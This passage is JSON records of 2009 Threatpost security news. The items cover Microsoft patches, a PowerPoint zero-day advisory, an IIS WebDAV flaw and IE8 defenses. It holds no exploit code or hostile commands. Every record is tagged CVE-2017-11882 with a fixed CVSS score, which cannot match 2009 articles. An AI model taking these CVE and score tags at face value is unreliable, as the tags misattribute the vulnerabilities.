Read the full story [here](<http://blogs.zdnet.com/security/?p=3553>).\n", "cvss3": {}, "published": "2009-06-09T20:26:38", "type": "threatpost", "title": "Microsoft unleashes 31 fixes on Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:09", "id": "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "href": "https://threatpost.com/microsoft-unleashes-31-fixes-patch-tuesday-060909/72724/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:59", "description": "Microsoft plans to ship 10 security bulletins next Tuesday (June 9, 2009) with fixes for a wide range of code execution vulnerabilities affecting Windows, Microsoft Office and Internet Explorer.\n\nSix of the ten bulletins will be rated \u201ccritical,\u201d Microsoft\u2019s highest severity rating. See the [advance notice advisory](<http://www.microsoft.com/technet/security/bulletin/ms09-jun.mspx>) [microsoft.com]. Read more [at ZDNet Zero Day](<http://blogs.zdnet.com/security/?p=3503>).\n", "cvss3": {}, "published": "2009-06-04T18:02:33", "type": "threatpost", "title": "Coming on MS Patch Tuesday: 10 bulletins, 6 critical", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:08", "id": "THREATPOST:0ACA8133652DA5D5C5D027A4F9EED75A", "href": "https://threatpost.com/coming-ms-patch-tuesday-10-bulletins-6-critical-060409/72733/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:04", "description": "Microsoft has confirmed the reported [vulnerability in the WebDAV implementation in IIS 5.0, 5.1 and 6.0](<http://www.microsoft.com/technet/security/advisory/971492.mspx>), saying that the flaw could be used to bypass the authentication mechanism on the Web server. 
However, the company said that there are a number of mitigating factors involved and that company security officials have not seen any attacks against the weakness so far.\n\nMicrosoft officials said that the vulnerability is mitigated by several things, including the fact that WebDAV is not enabled by default on IIS 6.0. However, the WebDAV protocol is widely used to share documents and information on Web servers. Normally implemented access control lists (ACLs), which prevent users from accessing files that they do not have permission to access, also would limit the damage of an attack.\n\nThe company also said that the vulnerability affects versions 5.0 and 5.1 of IIS, along with 6.0, which was the version that had been reported to be vulnerable originally. The most effective workaround until a patch is available is to disable WebDAV.\n", "cvss3": {}, "published": "2009-05-19T13:59:37", "type": "threatpost", "title": "Microsoft confirms flaw in WebDAV in IIS", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:13", "id": "THREATPOST:FAE0DDDC6420E9881C1D719E13B77095", "href": "https://threatpost.com/microsoft-confirms-flaw-webdav-iis-051909/72674/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:04", "description": "[From Computerworld (Gregg Keizer)](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9133240>)[](<https://threatpost.com/new-windows-netbooks-may-harbor-malware-051909/>)\n\nAfter discovering attack code on a brand new Windows XP netbook, anti-virus vendor Kaspersky Labs warned users yesterday that they should scan virgin systems for malware before connecting them to the Internet.\n\nWhen Kaspersky developers installed their recently-released Security for Ultra Portables on an M&A Companion Touch netbook purchased for testing, \u201cthey thought something strange was going on,\u201d 
[said Roel Schouwenberg](<http://www.viruslist.com/en/weblog?weblogid=208187720>) [viruslist.com], a senior anti-virus researcher with the Moscow-based firm. Schouwenberg scanned the machine \u2014 a $499 netbook designed for the school market \u2014 and found three pieces of malware. [Read the full story](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9133240>) [computerworld.com]\n", "cvss3": {}, "published": "2009-05-19T15:38:56", "type": "threatpost", "title": "New Windows netbooks may harbor malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:14", "id": "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "href": "https://threatpost.com/new-windows-netbooks-may-harbor-malware-051909/72668/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:05", "description": "[From eWEEK (Brian Prince)](<http://www.eweek.com/c/a/Security/Pirated-Windows-7-Builds-a-Botnet-With-Trojan-456054/>)\n\nAttackers pushing pirated, malware-laced copies of Microsoft\u2019s upcoming Windows 7 operating system have been actively trying to build a botnet.\n\nAccording to researchers at Damballa, attackers hid a Trojan inside of pirated copies of the operating system and began circulating them on BitTorrent sites. Damballa reported that it shut down the botnet\u2019s command and control server May 10, but by that time infection rates had risen as high as 552 users per hour. 
[Read the full story](<http://www.eweek.com/c/a/Security/Pirated-Windows-7-Builds-a-Botnet-With-Trojan-456054/>) [eweek.com]\n", "cvss3": {}, "published": "2009-05-12T22:23:28", "type": "threatpost", "title": "Pirated Windows 7 builds botnet with Trojan", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:12", "id": "THREATPOST:AA7C9EFD06F74FBC5580C0384A39AA56", "href": "https://threatpost.com/pirated-windows-7-builds-botnet-trojan-051209/72691/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:10", "description": "\n\nMicrosoft has developed an ultra-secure version of Windows XP, with many settings locked down by default. But the hardened OS isn\u2019t for sale to the general public; it\u2019s made specifically for the military. Microsoft built the secure version of XP a few years ago at the direction of the Air Force, which had grown weary of the constant updates to other Windows versions and had just seen its network defenses abused in a penetration test by the National Security Agency.\n\nIn response, the Air Force went to Microsoft and leaned on the software giant to put together a hardened version of XP, built to the service\u2019s specifications. As Wired.com\u2019s [Threat Level](<http://www.wired.com/threatlevel/2009/04/air-force-windows/>) reports:\n\nThe Air Force persuaded Microsoft CEO Steve Ballmer to provide it with a secure Windows configuration that saved the service about $100 million in contract costs and countless hours of maintenance. At a congressional hearing this week on cybersecurity, Alan Paller, research director of the Sans Institute, shared the story as a template for how the government could use its massive purchasing power to get companies to produce more secure products. 
And those could eventually be available to the rest of us.\n\nSecurity experts have been arguing for this \u201ctrickle-down\u201d model for years. But rather than wield its buying power for the greater good, the government has long wimped out and taken whatever vendors served them. If the Air Force case is a good judge, however, things might be changing.\n\nVarious government agencies have in fact tried this tactic before, with various levels of success. The [Department of Energy signed a contract with Oracle](<http://www.nytimes.com/2003/09/24/business/technology-briefing-software-oracle-and-energy-dept-increase-software-security.html?n=Top/News/Business/Companies/Oracle%20Corporation>) in 2003 that specified various minimum security settings in the company\u2019s products. Little has been heard of this effort since then, however.\n\nWhile this version was built to the Air Force\u2019s specifications, both home users and IT shops can benefit from the work by applying the [secure configuration settings for Windows XP](<http://csrc.nist.gov/itsec/guidance_WinXP.html>) published by the National Institute of Standards and Technology. 
The guidelines are step-by-step walkthroughs for locking down machines running XP, and there are similar guides for Windows Vista and other products on the NIST site.\n", "cvss3": {}, "published": "2009-05-01T14:37:52", "type": "threatpost", "title": "Microsoft develops secure Windows XP for military", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:05", "id": "THREATPOST:05CA5F0BEDE4AEE08ED1C40F6D413601", "href": "https://threatpost.com/microsoft-develops-secure-windows-xp-military-050109/72775/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:14", "description": "If there\u2019s one key message coming through all of the noise at the RSA Conference this week it\u2019s the fact that there\u2019s a pressing need for more data. Data on attacks, data on vulnerabilities, data on data breaches, data on software security, data on everything having to do with security. The mini-movement that has sprung up around metrics and measurement in security has taken over a lot of the conversation at the conference, with some interesting results.\n\nSeveral different panels and talks have addressed the metrics problem from a variety of angles, with the consensus being that there just simply isn\u2019t enough good data available in most parts of the industry. The last few years have seen a marked increase in the amount of data available on some topics, especially data breaches, but those are still the exceptions rather than the rule. In a panel Wednesday morning, four experts with disparate backgrounds said that a big part of the problem is that it\u2019s not clear what should be measured or how.\n\nEven Microsoft, which has been looking at this problem for several years, doesn\u2019t have a clear answer. 
Adam Shostack, a security program manager at Microsoft, said the company has good systems in place for measuring vulnerability counts and patch counts, but is still working on how to get the most out of those numbers.\n\n\u201cThe one thing we know is that our customer would like fewer updates and more secure software,\u201d he said during the panel discussion, which also included Gary McGraw of Cigital, Matt Blaze of the University of Pennsylvania and Elizabeth Nichols of PlexLogic. \u201cThat\u2019s the primary metric that we work off of.\u201d\n\nMcGraw, who has been working on measuring software security and internal software security programs for several years, said that even the organizations doing the best job with those programs have a tough time getting the most out of their measurement efforts. But the key thing is, at least they\u2019re doing the measurements. The vast majority of software makers and other companies that produce their own custom applications aren\u2019t even taking that step.\n\n\u201cA lot of people are selling highly flammable software. 
There\u2019s no one who isn\u2019t because people don\u2019t know how to build secure software,\u201d Blaze said.\n", "cvss3": {}, "published": "2009-04-22T19:52:40", "type": "threatpost", "title": "Experts call for better measurement of security", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:23", "id": "THREATPOST:21439BDD06D57894E0142A06D59463B5", "href": "https://threatpost.com/experts-call-better-measurement-security-042209/72562/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:16", "description": "[ \n](<https://threatpost.com/microsoft-unveil-patch-management-metrics-project-041509/>)\n\nMicrosoft on Wednesday plans to launch a new research effort to determine the total cost of the patch-management cycle, from testing and distributing a fix to user deployment of the patch. The end result of the project, which will be completely open and transparent to outsiders, will be a full metrics model that the company plans to make freely available.\n\nThe metrics project will be handled by the analyst firm Securosis, which will do surveys and interviews with end users and will be responsible for building out the model. Rich Mogull, the firm\u2019s founder, said when Microsoft contacted him about the project he was encouraged by the open, product-neutral way in which the company wanted to approach it. \n\n\u201cThis is not a vendor tool. It\u2019s not product-focused at all,\u201d Mogull said. \u201cIt\u2019s focused on the organizations and the end users. We\u2019re looking at the patch management cycle. 
What are the total costs for the total cycle, from monitoring what you need to patch all the way to getting the patch out.\u201d\n\nAs part of the process, Securosis will be posting all of the correspondence between the firm and Microsoft about the project, inviting other vendors to participate and make suggestions and encouraging users to comment on the project as it progresses. Mogull said he hopes to have the first version of the model finished by the end of June.\n\nThe project is being driven on Microsoft\u2019s end by Jeff Jones, a strategy director in the company\u2019s Security Technology Unit. Mogull said that he and Jones have talked at length about the transparency and objectivity requirements around the metrics model.\n\n\u201cOur research model is radically transparent and that\u2019s how this is going to be too,\u201d Mogull said. \u201cEverything will be out in the open. I wouldn\u2019t do something like this if it wasn\u2019t. The goal for the project is to produce an objective, independent model, irrespective of Microsoft.\u201d\n\nMogull has created a separate [Web page](<http://securosis.com/projectquant>) to discuss the project, which is where the materials related to the effort will be available once it gets underway. He lists the goals and deliverables of the effort, which he\u2019s calling Project Quant for now, and emphasizes the open and transparent nature of the project.\n\n\u201cAll materials will be made publicly available throughout the project, including internal communications (the Totally Transparent Research process). 
The model will be developed through a combination of primary research, surveys, focused interviews, and public/community participation,\u201d Mogull writes.\n\n*Composite header image via [Robert Scoble](<http://www.flickr.com/photos/scobleizer/>)\u2018s Flickr photostream\n", "cvss3": {}, "published": "2009-04-15T11:45:37", "type": "threatpost", "title": "Microsoft to unveil patch management metrics project", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:21", "id": "THREATPOST:F28846A403C73C488A77B766A21BB3E5", "href": "https://threatpost.com/microsoft-unveil-patch-management-metrics-project-041509/72588/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:18", "description": "[From CIO (Robert McMillan)](<http://www.cio.com/article/488842/After_Attacks_Excel_Update_Due_From_Microsoft>)\n\n[](<https://threatpost.com/after-attacks-microsoft-readies-security-patches-040909/>)Corporate IT staffers will get a double whammy next week, as both [Microsoft and Oracle are set to release critical security updates](<http://www.cio.com/article/488842/After_Attacks_Excel_Update_Due_From_Microsoft>) [cio.com] on the same day, including a likely fix for an Excel bug that has been used by cybercriminals.\n\nThis month, Oracle\u2019s quarterly software fixes and Microsoft\u2019s monthly patches happen to fall on the same day, next Tuesday. For Windows users, there will be a lot to patch. Microsoft plans to release [eight updates in total](<http://www.microsoft.com/technet/security/bulletin/ms09-apr.mspx>) [microsoft.com]: Five of them are for Windows, with a single update each for Internet Explorer, Excel and Microsoft\u2019s Internet Security and Acceleration (ISA) server. [Read the full story](<http://www.cio.com/article/488842/After_Attacks_Excel_Update_Due_From_Microsoft>). 
More from [ZDNet Zero Day](<http://blogs.zdnet.com/security/?p=3116>) [zdnet.com]\n", "cvss3": {}, "published": "2009-04-09T20:27:27", "type": "threatpost", "title": "After attacks, Microsoft readies security patches", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:26", "id": "THREATPOST:69A935F9472525B2FDE94FC33D6C6B70", "href": "https://threatpost.com/after-attacks-microsoft-readies-security-patches-040909/72521/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:20", "description": "Trojan downloaders and malware that masquerades as security software are the two fastest-growing threats on the Web right now, according to an analysis by Microsoft\u2019s Malware Protection Center. In its latest [Software Intelligence Report](<http://www.microsoft.com/downloads/details.aspx?FamilyID=aa6e0660-dc24-4930-affd-e33572ccb91f&displaylang=en>), released on Wednesday, the MMPC found that a Trojan downloader named Renos that installs rogue security software was the most prevalent threat in the second half of 2008, increasing by 66 percent.\n\nTrojan downloaders in general have become a major problem as attackers continue to look for new ways to install malware on vulnerable machines. Microsoft found that these threats accounted for more than half of all of the malware removed by its Malicious Software Removal Tool from July through December of last year.\n\n\u201cThe prevalence of rogue security software has increased significantly over the past three periods. 
Rogue security software uses fear and annoyance tactics to convince victims to pay for \u2018full versions\u2019 of the software in order to remove and protect themselves from malware, to stop the continual alerts and warnings, or both,\u201d the report says.\n\n\n\nMicrosoft pulls the data for the SIR from the results it sees from removals of malware done by the MSRT on millions of PCs, both in the enterprise and in homes. So it\u2019s an interesting data set with a fairly broad sample base.\n\nOne other interesting nugget in the report is that only about 41 percent of browser-based exploits on pre-Vista versions of Windows targeted Microsoft products. On Vista, that number drops to about five percent. And both of those numbers have been going down over time. That\u2019s a trend that bears watching.\n\n_*Graph from Microsoft Security Intelligence Report_\n", "cvss3": {}, "published": "2009-04-08T14:14:09", "type": "threatpost", "title": "Microsoft: Rogue security software fastest-growing online threat", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:25", "id": "THREATPOST:8549E725CF51C109F7299A0CC5FACBE9", "href": "https://threatpost.com/microsoft-rogue-security-software-fastest-growing-online-threat-040809/72530/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:20", "description": "[](<https://threatpost.com/microsoft-issues-powerpoint-zero-day-warning-040209/>)Microsoft has issued an advisory to warn about an under-attack zero-day vulnerability affecting its PowerPoint software.\n\nAccording to [the pre-patch advisory](<http://www.microsoft.com/technet/security/advisory/969136.mspx>), the flaw allows remote code execution if a user opens a booby-trapped PowerPoint file. 
The company described the attacks as \u201climited and targeted.\u201d\n\nAffected software:\n\nMicrosoft Office PowerPoint 2000 Service Pack 3 \nMicrosoft Office PowerPoint 2002 Service Pack 3 \nMicrosoft Office PowerPoint 2003 Service Pack 3 \nMicrosoft Office 2004 for Mac\n\nIn the absence of a fix, Microsoft [recommends](<http://www.microsoft.com/technet/security/advisory/969136.mspx>) the following workarounds:\n\n * Do not open or save Office files that you receive from un-trusted sources or that are received unexpectedly from trusted sources.\n * Do not open or save Office files that you receive from un-trusted sources or that are received unexpectedly from trusted sources. This vulnerability could be exploited when a user opens a file.\n * Use the Microsoft Office Isolated Conversion Environment (MOICE) when opening files from unknown or untrusted sources. \n * The Microsoft Office Isolated Conversion Environment (MOICE) will protect Office 2003 installations by more securely opening Word, Excel, and PowerPoint binary format files.\n * Use Microsoft Office File Block policy to block the opening of Office 2003 and earlier documents from unknown or untrusted sources and locations.\n", "cvss3": {}, "published": "2009-04-02T23:35:53", "type": "threatpost", "title": "Microsoft issues PowerPoint zero-day warning", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:25", "id": "THREATPOST:A7710EFC5AA842A252861C862A3F8318", "href": "https://threatpost.com/microsoft-issues-powerpoint-zero-day-warning-040209/72535/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:24", "description": "[](<https://threatpost.com/ie8-security-stops-memory-bypass-attacks-032609/>)\n\nWhen Mark Dowd and Alex Sotirov demonstrated a technique for [bypassing Vista\u2019s memory protections](<http://taossa.com/archive/bh08sotirovdowd.pdf>) at Black Hat last 
year, the security community was stunned. Microsoft officials said at the time they were working on ways to defeat the pair\u2019s attack and now that protection has arrived, in the form of Internet Explorer 8.\n\nDowd (above, right), who works for IBM ISS in Australia, says in a blog post that the improvements that Microsoft has made in the [security of IE 8](<http://blogs.iss.net/archive/chicksdigIE8.html>) have the effect of preventing the memory-bypass attacks from working.\n\n\u201cBasically, the fix is simple: Loading .NET controls has been associated with a special privilege that users can enable or disable \u2013 and in the default configuration for the \u201cInternet Zone\u201d (the Medium-High setting), .NET controls have been disabled,\u201d Dowd writes.\n\nThe attack that Dowd and Sotirov (above, left) showed off at Black Hat was complex, but the basic premise is that they were able to load a .Net control onto a Web page into a location of their choosing, and with whatever permissions they chose. This allowed them to get around two of the main memory protections in Windows Vista, ASLR (Address Space Layout Randomization) and DEP (Data Execution Prevention). These two technologies are a major part of the security upgrades that Microsoft added to Vista, and Dowd and Sotirov\u2019s attack was seen as a breakthrough.\n\nBut now, with the addition of the new permission to IE 8, Microsoft has put a stop to that particular attack. As [Jonathan Ness](<http://blogs.technet.com/srd/archive/2009/03/23/released-build-of-internet-explorer-8-blocks-dowd-sotirov-aslr-dep-net-bypass.aspx>) of the Microsoft Security Response Center writes in his blog on IE 8 security, \u201cThe final release of Internet Explorer 8 on Windows Vista blocks the .NET DEP+ASLR bypass mechanism from malicious websites on the Internet. Specifically, IE8 created a new URLAction that regulates loading of the .NET MIME filter. 
By default, the URLAction prevents it from loading in the Internet and Restricted Sites Zones. The .NET MIME filter is allowed to load by default in the Intranet Zone.\u201d \n\n\n\nThis is a nice advance for Microsoft and for its customers. IE for years has been seen as by far the least secure of the major browsers, but that perception may be shifting now. At last week\u2019s CanSecWest conference, the hackers in the Pwn2Own contest went right after Safari, believing that IE 8 on Vista was too tough to crack. It eventually went down, surprising many of the researchers in attendance.\n\nThis is all to the good, as Dowd writes.\n\n\u201cSo, the net effect (no pun intended) of this change is that by default, our technique will no longer work in its current form against IE8 browsers in their default configuration. There are also a number of other security enhancements in IE8,\u201d he writes. \u201cMost notably, the browser now runs in \u2018Protected Mode.\u2019 Essentially, this means that the browsing process runs in a sandbox of sorts with a restricted set of privileges. (Internally, this is implemented by utilizing Vista\u2019s \u2018Low Integrity\u2019 mode and communicating to a broker process via an out of process COM server. But, that is the topic of another post.) Furthermore, DEP has been enabled in IE8, which is a big change from IE7. This means that IE8 now fully reaps the benefits of the Vista memory protections. Hacking it is going to be hard! .. 
Probably!\u201d\n", "cvss3": {}, "published": "2009-03-26T18:27:42", "type": "threatpost", "title": "IE8 security stops memory bypass attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:25", "id": "THREATPOST:17ABCE7BEBAC56FCA5601686C9601728", "href": "https://threatpost.com/ie8-security-stops-memory-bypass-attacks-032609/72537/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:25", "description": "Microsoft has hired yet another well-known security researcher to join its ever-growing team of exploit and defense experts. This time it\u2019s Ken Johnson, known in the hacker world as [Skywing](<http://www.nynaeve.net/>). Johnson is known as an expert on debugging and reverse engineering, and has done a tremendous amount of work [tearing apart Windows defenses](<http://www.uninformed.org/?v=2&a=4>) specifically.\n\nBefore moving to Microsoft, Johnson was working for Positive Networks, a VPN provider. In a [blog post](<http://blogs.msdn.com/michael_howard/archive/2009/03/24/ken-johnson-skywing-joins-microsoft.aspx>) announcing Johnson\u2019s hiring, Microsoft software security guru Mike Howard praised Johnson\u2019s experience and skill. \n\n\u201cKen brings an enormous amount of reverse engineering and defense-subversion skill to Microsoft. Ken will be working on anything and everything related vulnerabilities, exploits, defenses, bypassing defenses and more,\u201d Howard said.\n\nJohnson\u2019s hiring is the latest in a series of interesting personnel moves for Microsoft\u2019s security group. The changes essentially began about three years ago when Adam Shostack joined Microsoft. Shostack is a well-known security and privacy expert and had spent years in start-ups and smaller organizations and was not afraid to be critical of Microsoft\u2019s policies. 
\n\n\u201cIn the past, I\u2019ve [heaped scorn](<http://www.securityfocus.com/news/315>) on Microsoft\u2019s security related decisions. Over the last few years, I\u2019ve watched Microsoft embrace security. I\u2019ve watched them make very large investments in security, including hiring my friends and colleagues. And really, I\u2019ve watched them produce results,\u201d Shostack wrote in a [blog post at the time of his hiring at Microsoft](<http://www.emergentchaos.com/archives/2006/06/im_joining_microsoft.html>). \n\nThen in January 2008 Microsoft hired Crispin Cowan, an expert on Linux and open-source security who was the brains behind the Immunix security-enhanced Linux distribution. And a few months later Matt Miller joined Microsoft, as well. Known as [Skape](<http://hick.org/~mmiller/>), Miller was a big part of HD Moore\u2019s [Metasploit Project](<http://metasploit.org/>) team and is known for his work on exploitation techniques.\n\nGiven the emphasis that Microsoft has placed on anti-exploitation and memory protection in its most recent releases, including Vista and Internet Explorer 8, it stands to reason that the company will continue to bring in more of the people who have done work on the other side of that fence. There\u2019s no defense like a good offense. 
\n", "cvss3": {}, "published": "2009-03-25T15:27:43", "type": "threatpost", "title": "Ken \"Skywing\" Johnson joins Microsoft security team", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:29", "id": "THREATPOST:088C4C91495F7C7262D861A66DC74B85", "href": "https://threatpost.com/ken-skywing-johnson-joins-microsoft-security-team-032509/72482/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:26", "description": "[By Robert Westervelt, SearchSecurity.com](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1351376,00.html?track=sy160>)\n\n[](<https://threatpost.com/internet-explorer-8-includes-bevy-security-features-032009/>)Microsoft has officially released [Internet Explorer 8 today](<http://www.microsoft.com/windows/internet-explorer/default.aspx>) [microsoft.com] with a number of new security features to improve privacy and protect against phishing and cross-site-scripting attacks. [From the article](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1351376,00.html?track=sy160>):\n\nMicrosoft is trying to mitigate some of the common issues with a cross-site-scripting (XSS) filter, which protects against Type-1 XSS attacks. The filter in IE 8 monitors all of the requests and responses made by the browser and automatically disables XSS attacks when they\u2019re detected. When an attack is blocked, users will be alerted with a modified version of the requested page. The browser also has a built-in feature that analyzes URL strings and highlights the top-level domain in the address bar to prevent a person being victimized by website spoofing.\n\nAnd more:\n\nMicrosoft also addressed the growing need for privacy while browsing certain websites. A new feature called InPrivate browsing mode, enables users to control whether IE saves a record of their browsing session. 
Similar to the Incognito mode in Google\u2019s Chrome browser, InPrivate in IE 8 won\u2019t save cookies, passwords, browsing history or any other record if it is enabled. Microsoft said InPrivate also prevents form data, passwords and temporary Internet files from being stored, keeping the session completely private.\n\nIE 8 also includes a feature to block clickjacking attacks, preventing users from clicking an obscured or hidden Web element. The feature detects a website header designed by Web developers that declares how many frames a sensitive Web page can contain. Microsoft says the technique is not perfect, but will substantially mitigate the threat of clickjacking on sensitive websites.\n\nRead [the full article](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1351376,00.html?track=sy160>) [techtarget].\n", "cvss3": {}, "published": "2009-03-20T17:17:02", "type": "threatpost", "title": "Internet Explorer 8 includes a bevy of security features", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:37", "id": "THREATPOST:215398BCE165265631436077B4E79ECB", "href": "https://threatpost.com/internet-explorer-8-includes-bevy-security-features-032009/72388/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:27", "description": "[](<https://threatpost.com/cansecwest-caution-community-play-031909/>)\n\nCanSecWest, in beautiful Vancouver BC, is one of my favorite conferences each year. It\u2019s a cozy little security con that brings together security researchers from all parts of the security ecosystem. Like a [PhNeutral](<http://ph-neutral.darklab.org/>) or a [BlueHat](<http://technet.microsoft.com/en-us/security/cc261637.aspx>), one never quite knows what to expect out of a CanSecWest, but we do know that Microsoft products and engineers will play a prominent role. 
We\u2019ll be presenting new security innovations and new tools, we\u2019ll be watching Pwn2Own closely for possible hacks, and we\u2019ll be happy to discuss our industry best practices in the hallway track.\n\nSecurity gatherings such as this allow the ecosystem to exchange information and awareness in order to become more secure. The more we know about the attacks, the better prepared we can be on defense. Presentations like Matt Miller\u2019s \u201cThe Evolution of Microsoft\u2019s Exploit Mitigations\u201d and Jason Shirk and Dave Weinstein\u2019s \u201cAutomated Real-time and Post Mortem Security Crash Analysis and Categorization\u201d demonstrate that as Microsoft learns more about an attack, we incorporate this information into techniques and tools that we share with our developer community. Stay tuned for more news and posts throughout the show.\n\n**[ SEE: **[**Android, iPhone security under scrutiny at CanSecWest**](<https://threatpost.com/android-iphone-security-under-scrutiny-cansecwest-031809/>)** ]**\n\nAgain this year, [CanSecWest features the Pwn2Own contest](<http://cansecwest.com/post/2009-03-18-01:00:00.PWN2OWN_Final_Rules>) \u2013 a contest that pits researchers against technologies to see whether technology or human wins. It\u2019s also a contest that presents interesting challenges to Microsoft and a contest which you might think Microsoft opposes. Like many other issues in the security ecosystem \u2013 it\u2019s not that simple. The contest exemplifies two basic tenets behind the TwC Security teams\u2019 efforts. You can\u2019t hide from the truth (wishing doesn\u2019t make it so) and every issue is an opportunity to learn and improve.\n\nWe recognize that all vendors\u2019 products may be found vulnerable and Microsoft welcomes the contest as another opportunity to engage the security community in productive dialogue around responsible disclosure and effective security engineering. 
We also see that Pwn2Own provides an opportunity to educate the public and we believe it can showcase Microsoft\u2019s security engineering efforts, both relative to our competitors and in an absolute sense.\n\n**[ SEE: [Pwn2Own trifecta: Hacker exploits IE8, Firefox, Safari](<https://threatpost.com/pwn2own-trifecta-hacker-exploits-ie8-firefox-safari-031809/>) ]**\n\nThe security community is offering knowledge of attacks and defenses that consumers and other vendors can use to stay safe or create more secure products. The rest of the story \u2013 and an additional measure the security community could use to evaluate vendors\u2019 products \u2013 is what happens after the contest ends. Rest assured Microsoft will take this information and apply it towards securing our networks, platforms and applications (hopefully before they ship), and to create the strong response processes and engineering discipline that are necessary for our communal security. And as always, the MSRC is ready to work to investigate any vulnerabilities that researchers might find during the Pwn2Own contest.\n\n**[ SEE: **[**Paul Roberts: Mobile security can no longer be ignored**](<https://threatpost.com/mobile-security-can-no-longer-be-ignored-031809/>)** ]**\n\nBy the end of the contest, co-sponsor [Tipping Point](<http://www.zerodayinitiative.com/about/>) will be the owners of many new vulnerabilities. They value the protection of their customers and will need to work with their partners in the security ecosystem to make sure everybody is protected as quickly as possible (one more way consumers benefit). One of the goals of responsible disclosure is for the vulnerability details to emerge at the same time that an update is available from the vulnerable vendor. 
The CanSecWest conference organizer also has a responsible disclosure policy, as do all of the conference organizers that the EcoStrat team is able to support worldwide each year.\n\nAlthough innovative contests put some of us in a place that is not always comfortable, it\u2019s valuable for the ecosystem to come together with contests like Pwn2Own and Iron Chef Black Hat, to better understand and solve common issues. It\u2019s yet another example of the \u201cteam of rivals\u201d strategy. Let the contest begin!\n\n_* Sarah Blankinship is a senior security strategist lead in Microsoft\u2019s Ecosystem Strategy team._\n", "cvss3": {}, "published": "2009-03-19T15:40:46", "type": "threatpost", "title": "CanSecWest: Caution, community at play", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-03T18:00:20", "id": "THREATPOST:9B11E0EF22481CA407924C58E8C7F8C1", "href": "https://threatpost.com/cansecwest-caution-community-play-031909/72396/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:28", "description": "[](<https://threatpost.com/should-microsoft-be-security-business-031909/>)\n\nGartner security analyst Neil MacDonald thinks [there are five levels to the 